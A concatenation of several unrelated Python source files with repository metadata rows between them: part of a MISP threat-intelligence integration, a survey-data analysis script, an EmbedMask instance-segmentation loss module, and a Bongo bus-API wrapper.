event_highlights.append({
'Event ID': event.get('ID'),
'Event Tags': event_tags,
'Event Galaxies': event_galaxies,
'Event Objects': event_objects,
'Publish Timestamp': event.get('PublishTimestamp'),
'Event Info': event.get('Info'),
'Event Org ID': event.get('OrganizationID'),
'Event Orgc ID': event.get('OwnerOrganization.ID'),
'Event Distribution': event.get('Distribution'),
'Event UUID': event.get('UUID'),
})
return event_highlights
def search_events(demisto_args: dict) -> CommandResults:
"""
Execute a MISP search using the 'event' controller.
"""
args = prepare_args_to_search('events')
page = arg_to_number(demisto_args.get('page', 1), "page", required=True)
limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True)
pagination_args_validation(page, limit)
response = PYMISP.search(**args)
if response:
response_for_context = build_events_search_response(response)
event_outputs_to_human_readable = event_to_human_readable(response_for_context)
pagination_message = f"Current page size: {limit}\n"
if len(response_for_context) == limit:
pagination_message += f"Showing page {page} out others that may exist"
else:
pagination_message += f"Showing page {page}"
md = tableToMarkdown(
f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}",
event_outputs_to_human_readable, removeNull=True)
return CommandResults(
raw_response=response,
readable_output=md,
outputs=response_for_context,
outputs_prefix="MISP.Event",
outputs_key_field="ID"
)
else:
return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}")
def delete_event(demisto_args: dict):
"""
Gets an event id and deletes it.
"""
event_id = demisto_args.get('event_id')
response = PYMISP.delete_event(event_id)
if 'errors' in response:
raise DemistoException(f'Event ID: {event_id} was not found in MISP: \nError message: {response}')
else:
human_readable = f'Event {event_id} has been deleted'
return CommandResults(readable_output=human_readable, raw_response=response)
def add_tag(demisto_args: dict, is_attribute=False):
"""
Adds a tag to the given UUID of an event or an attribute.
is_attribute (bool): whether the given UUID belongs to an attribute (True) or an event (False).
"""
uuid = demisto_args.get('uuid')
tag = demisto_args.get('tag')
try:
PYMISP.tag(uuid, tag) # add the tag
except PyMISPError:
raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.")
if is_attribute:
response = PYMISP.search(uuid=uuid, controller='attributes')
human_readable = f'Tag {tag} has been successfully added to attribute {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(response),
raw_response=response
)
# event's uuid
response = PYMISP.search(uuid=uuid)
human_readable = f'Tag {tag} has been successfully added to event {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(response),
raw_response=response
)
def remove_tag(demisto_args: dict, is_attribute=False):
"""
Removes a tag from the given UUID of an event or an attribute.
is_attribute (bool): whether the given UUID belongs to an attribute (True) or an event (False).
"""
uuid = demisto_args.get('uuid')
tag = demisto_args.get('tag')
try:
response = PYMISP.untag(uuid, tag)
if response and response.get('errors'):
raise DemistoException(f'Error in `{demisto.command()}` command: {response}')
except PyMISPError:
raise DemistoException("Removing the required tag was failed. Please make sure the UUID and tag exist.")
if is_attribute:
response = PYMISP.search(uuid=uuid, controller='attributes')
human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(response),
raw_response=response
)
# event's uuid
response = PYMISP.search(uuid=uuid)
human_readable = f'Tag {tag} has been successfully removed from the event {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(response),
raw_response=response
)
def add_sighting(demisto_args: dict):
"""Adds sighting to MISP attribute
"""
attribute_id = demisto_args.get('id')
attribute_uuid = demisto_args.get('uuid')
sighting_type = demisto_args['type'] # mandatory arg
att_id = attribute_id or attribute_uuid
if not att_id:
raise DemistoException('ID or UUID not specified')
sighting_args = {
'id': attribute_id,
'uuid': attribute_uuid,
'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type]
}
sigh_obj = MISPSighting()
sigh_obj.from_dict(**sighting_args)
response = PYMISP.add_sighting(sigh_obj, att_id)
if response.get('message'):
raise DemistoException(f"An error was occurred: {response.get('message')}")
elif response.get('Sighting'):
human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}'
return CommandResults(readable_output=human_readable)
raise DemistoException(f"An error was occurred: {json.dumps(response)}")
def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit):
"""
Test module.
"""
is_tag_list_valid(malicious_tag_ids)
is_tag_list_valid(suspicious_tag_ids)
if attributes_limit < 0:
raise DemistoException('Attribute limit has to be a positive number.')
response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json')
if PYMISP._check_json_response(response):
return 'ok'
else:
raise DemistoException('Failed to connect to MISP.')
def build_feed_url(demisto_args):
url = demisto_args.get('feed')
url = url[:-1] if url.endswith('/') else url
if PREDEFINED_FEEDS.get(url):
url = PREDEFINED_FEEDS[url].get('url') # type: ignore
return url
def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict):
"""Gets an OSINT feed from url and publishing them to MISP
urls with feeds for example: https://www.misp-project.org/feeds/
feed format must be MISP.
"""
headers = {'Accept': 'application/json'}
url = build_feed_url(demisto_args)
osint_url = f'{url}/manifest.json'
limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True)
try:
uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json()
events_ids = list() # type: List[Dict[str, int]]
for index, uri in enumerate(uri_list, 1):
response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json()
misp_new_event = MISPEvent()
misp_new_event.load(response)
add_event_response = PYMISP.add_event(misp_new_event)
event_object = add_event_response.get('Event')
if event_object and 'id' in event_object:
events_ids.append({'ID': event_object['id']})
if limit == len(events_ids):
break
human_readable = tableToMarkdown(f'Total of {len(events_ids)} events were added to MISP.', events_ids)
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=events_ids,
)
except ValueError as e:
raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}')
def add_object(event_id: str, obj: MISPObject):
"""Sending object to MISP and returning outputs
Args:
obj: object to add to MISP
event_id: ID of event
"""
response = PYMISP.add_object(event_id, misp_object=obj)
if 'errors' in response:
raise DemistoException(f'Error in `{demisto.command()}` command: {response}')
for ref in obj.ObjectReference:
response = PYMISP.add_object_reference(ref)
for attribute in response.get('Object', {}).get('Attribute', []):
convert_timestamp_to_readable(attribute, None)
response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp'))
formatted_response = replace_keys_from_misp_to_context_data(response)
formatted_response.update({"ID": event_id})
human_readable = f'Object has been added to MISP event ID {event_id}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=formatted_response,
)
def add_file_object(demisto_args: dict):
entry_id = demisto_args.get('entry_id')
event_id = demisto_args.get('event_id')
file_path = demisto.getFilePath(entry_id).get('path')
obj = FileObject(file_path)
return add_object(event_id, obj)
def add_domain_object(demisto_args: dict):
"""Adds a domain object to MISP
domain-ip description: https://www.misp-project.org/objects.html#_domain_ip
"""
text = demisto_args.get('text')
event_id = demisto_args.get('event_id')
domain = demisto_args.get('name')
obj = MISPObject('domain-ip')
ips = argToList(demisto_args.get('ip'))
for ip in ips:
obj.add_attribute('ip', value=ip)
obj.add_attribute('domain', value=domain)
if text:
obj.add_attribute('text', value=text)
return add_object(event_id, obj)
def add_url_object(demisto_args: dict):
"""Building url object in MISP scheme
Scheme described https://www.misp-project.org/objects.html#_url
"""
url_args = [
'text',
'last_seen',
'first_seen'
]
event_id = demisto_args.get('event_id')
url = demisto_args.get('url')
url_parse = urlparse(url)
url_obj = [{'url': url}]
url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None
url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None
url_obj.append({'query_string': url_parse.query}) if url_parse.query else None
url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None
url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None
url_obj.append({'port': url_parse.port}) if url_parse.port else None
url_obj.append(
{'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None
url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args))
g_object = build_generic_object('url', url_obj)
return add_object(event_id, g_object)
def add_generic_object_command(demisto_args: dict):
event_id = demisto_args.get('event_id')
template = demisto_args.get('template')
attributes = demisto_args.get('attributes').replace("'", '"')
try:
args = json.loads(attributes)
if not isinstance(args, list):
args = dict_to_generic_object_format(args)
obj = build_generic_object(template, args)
return add_object(event_id, obj)
except ValueError as e:
raise DemistoException(
f'`attribute` parameter could not be decoded, it may not be valid JSON\nattribute: {attributes}', str(e))
def convert_arg_to_misp_args(demisto_args, args_names):
return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)]
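# For example (hypothetical args): convert_arg_to_misp_args(
#     {'dst_port': '443', 'ip_src': '8.8.8.8'}, ['dst_port', 'ip_src'])
# -> [{'dst-port': '443'}, {'ip-src': '8.8.8.8'}]  # underscores become hyphens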
def add_ip_object(demisto_args: dict):
event_id = demisto_args.get('event_id')
ip_object_args = [
'dst_port',
'src_port',
'domain',
'hostname',
'ip_src',
'ip_dst'
]
# converting args to MISP's arguments types
misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args)
ips = argToList(demisto_args.get('ip'))
for ip in ips:
misp_attributes_args.append({'ip': ip})
if misp_attributes_args:
non_req_args = [
'first_seen',
'last_seen',
]
misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args))
misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None
obj = build_generic_object('ip-port', misp_attributes_args)
return add_object(event_id, obj)
else:
raise DemistoException(
f'None of the required arguments is present. Command {demisto.command()} requires one of {ip_object_args}')
def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids):
"""
Gets 2 sets of tag ids. If an id exists in both sets, it is removed from the suspicious tag ids set and stays
only in the malicious one (a tag configured as malicious is stronger than one recognised as suspicious).
"""
common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids)
suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids}
return malicious_tag_ids, suspicious_tag_ids
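# For example (hypothetical ids): handle_tag_duplication_ids({'1', '2'}, {'2', '3'})
# -> ({'1', '2'}, {'3'}), i.e. id '2' stays only in the malicious set.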
def is_tag_list_valid(tag_ids):
"""Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers."""
for tag in tag_ids:
try:
tag = int(tag)
if tag <= 0:
raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.")
except ValueError:
raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.")
def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute:
attribute_type = demisto_args.get('type')
distribution = demisto_args.get('distribution')
category = demisto_args.get('category')
comment = demisto_args.get('comment')
value = demisto_args.get('value')
first_seen = demisto_args.get('first_seen')
last_seen = demisto_args.get('last_seen')
attribute_instance = MISPAttribute()
attribute_instance.uuid = attribute_uuid
if attribute_type:
attribute_instance.type = attribute_type
if distribution:
attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution]
if category:
attribute_instance.category = category
if value:
attribute_instance.value = value
if comment:
attribute_instance.comment = comment
if first_seen:
attribute_instance.first_seen = first_seen
if last_seen:
attribute_instance.last_seen = last_seen
return attribute_instance
def update_attribute_command(demisto_args: dict) -> CommandResults:
attribute_uuid = demisto_args.get('attribute_uuid')
attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid)
attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid)
if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'):
raise DemistoException(attribute_instance_response.get('errors'))
human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n"
attribute = attribute_instance_response.get('Attribute')
convert_timestamp_to_readable(attribute, None)
parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute)
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=parsed_attribute_data,
)
def main():
params = demisto.params()
malicious_tag_ids = argToList(params.get('malicious_tag_ids'))
suspicious_tag_ids = argToList(params.get('suspicious_tag_ids'))
reliability = params.get('integrationReliability', 'B - Usually reliable')
if DBotScoreReliability.is_valid_type(reliability):
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)
else:
Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter")
attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True)
command = demisto.command()
demisto.debug(f'[MISP V3]: command is {command}')
args = demisto.args()
try:
malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids)
if command == 'test-module':
return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,
attributes_limit=attributes_limit))
elif command == 'misp-create-event':
return_results(create_event_command(args))
elif command == 'misp-add-attribute':
return_results(add_attribute(demisto_args=args))
elif command == 'misp-search-events':
return_results(search_events(args))
elif command == 'misp-search-attributes':
return_results(search_attributes(args))
elif command == 'misp-delete-event':
return_results(delete_event(args))
elif command == 'misp-add-sighting':
return_results(add_sighting(args))
elif command == 'misp-add-tag-to-event':
return_results(add_tag(args))
elif command == 'misp-add-tag-to-attribute':
return_results(add_tag(demisto_args=args, is_attribute=True))
elif command == 'misp-remove-tag-from-event':
return_results(remove_tag(args))
elif command == 'misp-remove-tag-from-attribute':
return_results(remove_tag(demisto_args=args, is_attribute=True))
elif command == 'misp-add-events-from-feed':
return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES))
elif command == 'file':
return_results(
generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'url':
return_results(
generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'ip':
return_results(
generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'domain':
return_results(
generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit))
elif command == 'email':
return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit))
elif command == 'misp-add-file-object':
return_results(add_file_object(args))
elif command == 'misp-add-domain-object':
return_results(add_domain_object(args))
elif command == 'misp-add-url-object':
return_results(add_url_object(args))
elif command == 'misp-add-ip-object':
return_results(add_ip_object(args))
elif command == 'misp-add-object':
return_results(add_generic_object_command(args))
elif command == 'misp-update-attribute':
return_results(update_attribute_command(args))
except PyMISPError as e:
return_error(e.message)
except Exception as e:
return_error(str(e))
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
| 41.869767
| 120
| 0.674295
| 8,050
| 63,014
| 5.019876
| 0.085466
| 0.025588
| 0.019055
| 0.01465
| 0.406533
| 0.334967
| 0.282999
| 0.235882
| 0.198293
| 0.161594
| 0
| 0.003746
| 0.224775
| 63,014
| 1,504
| 121
| 41.897606
| 0.823378
| 0.152442
| 0
| 0.202912
| 0
| 0.00546
| 0.177397
| 0.017067
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057325
| false
| 0.00273
| 0.007279
| 0.00091
| 0.134668
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8678e0fdfc11399c75f91f8ec0af910ceb4aab00
| 3,212
|
py
|
Python
|
python_survey/finished_files/main.py
|
trenton3983/PyCharmProjects
|
fae8653a25e07e7384eb0ddf6ea191adeb44face
|
[
"MIT"
] | null | null | null |
python_survey/finished_files/main.py
|
trenton3983/PyCharmProjects
|
fae8653a25e07e7384eb0ddf6ea191adeb44face
|
[
"MIT"
] | null | null | null |
python_survey/finished_files/main.py
|
trenton3983/PyCharmProjects
|
fae8653a25e07e7384eb0ddf6ea191adeb44face
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats
from finished_files.survey_data_dictionary import DATA_DICTIONARY
# Load data
# We want to take the names list from our data dictionary
names = [x.name for x in DATA_DICTIONARY]
# Generate the list of names to import
usecols = [x.name for x in DATA_DICTIONARY if x.usecol]
# dtypes should be a dict of 'col_name' : dtype
dtypes = {x.name : x.dtype for x in DATA_DICTIONARY if x.dtype}
# same for converters
converters = {x.name : x.converter for x in DATA_DICTIONARY if x.converter}
df = pd.read_csv('data/survey.csv',
header=0,
names=names,
dtype=dtypes,
converters=converters,
usecols=usecols)
#%% Clean up data: remove disqualified users
# In the survey, any user who selected they don't use Python was then
# disqualified from the rest of the survey. So let's drop them here.
df = df[df['python_main'] != 'No, I don’t use Python for my current projects']
# Considering we now only have two categories left:
# - Yes
# - No, I use Python for secondary projects only
# Let's turn it into a bool
df['python_main'] = df['python_main'] == 'Yes'
#%% Plot the web dev / data scientist ratio
# In the survey, respondents were asked to estimate the ratio between
# the amount of web developers vs the amount of data scientists. Afterwards
# they were asked what they thought the most popular answer would be.
# Let's see if there's a difference!
# This is a categorical data point, and it's already ordered in the data
# dictionary. So we shouldn't sort it after counting the values.
ratio_self = df['webdev_science_ratio_self'].value_counts(sort=False)
ratio_others = df['webdev_science_ratio_others'].value_counts(sort=False)
# Let's draw a bar chart comparing the distributions
fig = plt.figure()
ax = fig.add_subplot(111)
RATIO_COUNT = ratio_self.count()
x = np.arange(RATIO_COUNT)
WIDTH = 0.4
self_bars = ax.bar(x-WIDTH, ratio_self, width=WIDTH, color='b', align='center')
others_bars = ax.bar(x, ratio_others, width=WIDTH, color='g', align='center')
ax.set_xlabel('Ratios')
ax.set_ylabel('Observations')
labels = [str(lbl) for lbl in ratio_self.index]
ax.set_xticks(x - 0.5 * WIDTH)
ax.set_xticklabels(labels)
ax.legend((self_bars[0], others_bars[0]),
('Self', 'Most popular'))
plt.show()
#%% Calculate the predicted totals
# Let's recode the ratios to numbers, and calculate the means
CONVERSION = {
'10:1': 10,
'5:1' : 5,
'2:1' : 2,
'1:1' : 1,
'1:2' : 0.5,
'1:5' : 0.2,
'1:10': 0.1
}
self_numeric = df['webdev_science_ratio_self'].replace(CONVERSION)
others_numeric = df['webdev_science_ratio_others'].replace(CONVERSION)
print(f'Self:\t\t{self_numeric.mean().round(2)} web devs / scientist')
print(f'Others:\t\t{others_numeric.mean().round(2)} web devs / scientist')
#%% Is the difference statistically significant?
result = scipy.stats.chisquare(ratio_self, ratio_others)
# The null hypothesis is that they're the same. Let's see if we can reject it
print(result)
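#%% Optional follow-up (a minimal sketch, assuming a scipy version whose result
# object exposes a `pvalue` attribute): check against the usual 5% level.
ALPHA = 0.05
if result.pvalue < ALPHA:
    print('The two distributions differ significantly')
else:
    print('No significant difference between the two distributions')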
| 31.184466
| 79
| 0.699253
| 515
| 3,212
| 4.264078
| 0.384466
| 0.051002
| 0.010929
| 0.018215
| 0.160747
| 0.075137
| 0.075137
| 0
| 0
| 0
| 0
| 0.014965
| 0.188668
| 3,212
| 103
| 80
| 31.184466
| 0.827705
| 0.362702
| 0
| 0.039216
| 0
| 0
| 0.195749
| 0.091943
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.098039
| 0
| 0.098039
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8679399f0ab155a65d5523949359b9a4e0752af4
| 4,918
|
py
|
Python
|
adet/modeling/embedmask/mask_pred.py
|
yinghdb/AdelaiDet
|
94a9b7cde92fb039852f876964d991a1f3e15af4
|
[
"BSD-2-Clause"
] | 3
|
2021-05-21T08:02:48.000Z
|
2021-11-05T11:06:40.000Z
|
adet/modeling/embedmask/mask_pred.py
|
yinghdb/AdelaiDet
|
94a9b7cde92fb039852f876964d991a1f3e15af4
|
[
"BSD-2-Clause"
] | null | null | null |
adet/modeling/embedmask/mask_pred.py
|
yinghdb/AdelaiDet
|
94a9b7cde92fb039852f876964d991a1f3e15af4
|
[
"BSD-2-Clause"
] | 1
|
2021-05-24T06:53:32.000Z
|
2021-05-24T06:53:32.000Z
|
import torch
from torch.nn import functional as F
from torch import nn
from torch.autograd import Variable
from adet.utils.comm import compute_locations, aligned_bilinear
def dice_coefficient(x, target):
eps = 1e-5
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
intersection = (x * target).sum(dim=1)
union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
loss = 1. - (2 * intersection / union)
return loss
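# Quick sanity check (illustrative only): identical masks yield a loss near 0,
# disjoint masks a loss near 1.
#
#   m = torch.ones(1, 8, 8)
#   dice_coefficient(m, m)                      # ~0
#   dice_coefficient(m, torch.zeros(1, 8, 8))   # ~1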
def lovasz_grad(gt_sorted):
"""
Computes gradient of the Lovasz extension w.r.t sorted errors
See Alg. 1 in paper
"""
p = len(gt_sorted)
gts = gt_sorted.sum()
intersection = gts - gt_sorted.float().cumsum(0)
union = gts + (1 - gt_sorted.float()).cumsum(0)
jaccard = 1. - intersection / union
if p > 1: # cover 1-pixel case
jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
return jaccard
def lovasz_hinge(logits, labels):
"""
Binary Lovasz hinge loss
logits: [P] Variable, logits at each prediction (between -\infty and +\infty)
labels: [P] Tensor, binary ground truth labels (0 or 1)
"""
if len(labels) == 0:
# only void pixels, the gradients should be 0
return logits.sum() * 0.
signs = 2. * labels.float() - 1.
errors = (1. - logits * Variable(signs))
errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
perm = perm.data
gt_sorted = labels[perm]
grad = lovasz_grad(gt_sorted)
loss = torch.dot(F.relu(errors_sorted), Variable(grad))
return loss
def lovasz_loss(x, target):
eps = 1e-6
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
x = torch.clamp(x, min=eps, max=1-eps)
x = torch.log(x) - torch.log(1 - x)
losses = []
for i in range(n_inst):
losses.append(lovasz_hinge(x[i], target[i]))
loss = torch.stack(losses)
return loss
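# Illustrative usage (shapes are hypothetical): both loss functions take
# per-instance mask probabilities in [0, 1] and binary ground-truth masks of
# the same shape, and return one loss value per instance.
#
#   probs = torch.rand(4, 1, 64, 64)
#   gt = (torch.rand(4, 1, 64, 64) > 0.5).float()
#   lovasz_loss(probs, gt).shape                # torch.Size([4])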
def build_mask_pred(cfg):
return MaskPred(cfg)
class MaskPred(nn.Module):
def __init__(self, cfg):
super(MaskPred, self).__init__()
self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS
self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE
soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST
self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2]))
self.register_buffer("_iter", torch.zeros([1]))
self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE
self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA
def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None):
if self.training:
self._iter += 1
gt_inds = pred_instances.gt_inds
gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances])
gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype)
losses = {}
if len(pred_instances) == 0:
dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0
losses["loss_mask"] = dummy_loss
else:
mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
if self.mask_loss_type == "Dice":
mask_losses = dice_coefficient(mask_prob, gt_bitmasks)
loss_mask = mask_losses.mean()
elif self.mask_loss_type == "Lovasz":
mask_losses = lovasz_loss(mask_prob, gt_bitmasks)
loss_mask = mask_losses.mean()
losses["loss_mask"] = loss_mask * self.mask_loss_alpha
return losses
else:
if len(pred_instances) > 0:
mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
pred_instances.pred_global_masks = mask_prob
return pred_instances
def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride):
proposal_embed = instances.proposal_embed
proposal_margin = instances.proposal_margin
im_inds = instances.im_inds
dim, m_h, m_w = pixel_embed.shape[-3:]
obj_num = proposal_embed.shape[0]
pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds]
proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1)
proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1)
mask_var = (pixel_embed - proposal_embed) ** 2
mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3))
assert mask_feat_stride >= self.mask_out_stride
assert mask_feat_stride % self.mask_out_stride == 0
mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride))
return mask_prob
| 36.42963
| 135
| 0.637861
| 698
| 4,918
| 4.239255
| 0.23639
| 0.032443
| 0.033119
| 0.017574
| 0.25414
| 0.196688
| 0.165259
| 0.129774
| 0.104765
| 0.077729
| 0
| 0.01898
| 0.250102
| 4,918
| 134
| 136
| 36.701493
| 0.783351
| 0.06344
| 0
| 0.153061
| 0
| 0
| 0.01096
| 0
| 0
| 0
| 0
| 0
| 0.020408
| 1
| 0.081633
| false
| 0
| 0.05102
| 0.010204
| 0.234694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8679dfd086b9b3768ebf7c42ebcbb01fc263b720
| 2,569
|
py
|
Python
|
bongo/core.py
|
codeforamerica/bongo
|
a1b162c54fc51630ae1cfac16e1c136b0ff320a3
|
[
"BSD-3-Clause"
] | null | null | null |
bongo/core.py
|
codeforamerica/bongo
|
a1b162c54fc51630ae1cfac16e1c136b0ff320a3
|
[
"BSD-3-Clause"
] | null | null | null |
bongo/core.py
|
codeforamerica/bongo
|
a1b162c54fc51630ae1cfac16e1c136b0ff320a3
|
[
"BSD-3-Clause"
] | 1
|
2021-04-17T10:21:05.000Z
|
2021-04-17T10:21:05.000Z
|
"""
A simple wrapper for the Bongo Iowa City bus API.
"""
import requests as req
class Bongo(object):
"""
A simple Python wrapper for the Bongo Iowa City bus API.
"""
def __init__(self, format='json'):
self.format = format
def get(self, endpoint, **kwargs):
"""Perform a HTTP GET request to the API and return the data."""
if 'format' not in kwargs:
kwargs['format'] = self.format
url = "http://ebongo.org/api/%s" % (endpoint)
response = req.get(url, params=kwargs)
return self.convert(response)
def convert(self, response):
"""Convert a request based on the response type."""
content_type = response.headers['content-type']
if content_type == 'application/json':
            data = response.json()
elif 'stoplist' in response.url:
# The `stoplist` endpoint insists that it's HTML.
            data = response.json()
else:
data = response.content
return data
def route(self, tag=None, agency=None, **kwargs):
"""
Get information on a specific route, or all route listings.
>>> Bongo().route('lantern', 'coralville')
{"coralville's": {"lantern": "route"}}
"""
if agency and tag:
endpoint = 'route'
kwargs['agency'] = agency
kwargs['route'] = tag
else:
endpoint = 'routelist'
return self.get(endpoint, **kwargs)
def routes(self):
"""
Same as an empty call to the `route` method.
>>> Bongo().routes()
{"routes": [1234, 5678, 9999]}
"""
return self.route()
def stop(self, number=None, **kwargs):
"""
Retrieve information specific to a given stop number.
>>> Bongo().stop(8350)
{"stop": {"8350": "information"}}
"""
if number:
endpoint = 'stop'
kwargs['stopid'] = number
else:
endpoint = 'stoplist'
return self.get(endpoint, **kwargs)
def stops(self):
"""
Same as an empty call to the `stop` method.
>>> Bongo().stops()
{"stops": [1234, 5678, 9999]}
"""
return self.stop()
def predict(self, number, **kwargs):
"""
Predict the bus arrival times for a specific stop.
>>> Bongo().predict(8350)
{"stop": {"8350": "prediction"}}
"""
endpoint = 'prediction'
kwargs['stopid'] = number
return self.get(endpoint, **kwargs)
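# Example usage sketch (the stop id is illustrative; responses depend on the
# live ebongo.org API):
#
#   bongo = Bongo()
#   routes = bongo.routes()          # all route listings
#   arrival = bongo.predict(8350)    # arrival predictions for stop 8350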
| 27.623656
| 72
| 0.534838
| 280
| 2,569
| 4.885714
| 0.310714
| 0.04386
| 0.028509
| 0.046053
| 0.180556
| 0.128655
| 0.084795
| 0.084795
| 0
| 0
| 0
| 0.023269
| 0.330868
| 2,569
| 92
| 73
| 27.923913
| 0.772542
| 0.318801
| 0
| 0.238095
| 0
| 0
| 0.088699
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.190476
| false
| 0
| 0.02381
| 0
| 0.404762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
